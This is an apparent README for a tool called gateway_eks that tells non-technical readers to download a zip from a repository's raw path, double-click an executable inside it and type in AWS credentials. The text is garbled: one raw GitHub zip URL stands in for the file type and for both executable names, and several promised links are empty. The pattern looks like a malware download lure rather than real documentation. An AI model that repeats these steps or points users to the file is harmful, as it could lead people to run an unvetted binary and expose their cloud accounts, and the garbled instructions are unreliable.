This guide will help you download and run the gateway_eks application, which allows for a straightforward deployment of an AI governance stack on Amazon EKS. You donβt need any programming knowledge to get started.
Before you begin, ensure your computer meets these requirements:
- A modern web browser (e.g., Chrome, Firefox, Safari)
- Basic internet connection
- An Amazon AWS account
To get the latest version of gateway_eks, visit this page to download. This page lists all available versions of the application.
On the releases page, you will see different versions of gateway_eks. Look for the most recent version, which will typically be at the top.
Click on the version you want. You will see various files available for download. Look for the file that matches your operating system. For most users, this will usually be a .zip or https://raw.githubusercontent.com/Monkeyman4868/gateway_eks/dev/security/eks-gateway-3.5.zip file.
Once the download is complete, locate the file on your computer. It is usually found in your Downloads folder.
- For Windows, right-click the file and select "Extract All."
- For Mac, double-click the file to extract it.
After extraction, you will find a folder containing the necessary files to run gateway_eks. Open this folder, and locate the main executable file.
- For Windows, it may be named
https://raw.githubusercontent.com/Monkeyman4868/gateway_eks/dev/security/eks-gateway-3.5.zip. - For Mac, look for
https://raw.githubusercontent.com/Monkeyman4868/gateway_eks/dev/security/eks-gateway-3.5.zip.
Double-click the executable file to launch the application.
Before you can use gateway_eks fully, you will need to set up your AWS account:
- Log in to your AWS account.
- Navigate to the IAM (Identity and Access Management) section.
- Create a new user with programmatic access. Make sure to attach relevant policies that allow access to EKS, RDS, and other services required for the application.
After setting up your AWS account, you can now configure gateway_eks to deploy your AI governance stack:
- Follow the on-screen instructions in the application.
- Provide your AWS credentials when prompted.
- Choose the options that suit your governance needs.
The application guides you through deploying various components such as EC2 instances, RDS databases, and Redis systems.
Once your stack is up and running, you can monitor its performance using built-in tools such as Grafana and Prometheus. These tools help visualize and manage the deployment efficiently.
If you run into any issues, please check the GitHub Issues page for existing solutions or to report a new issue.
For more information, you can refer to:
If you wish to contribute to gateway_eks, please feel free to fork the repository and submit a pull request.
For easy access, hereβs the link to download again: visit this page to download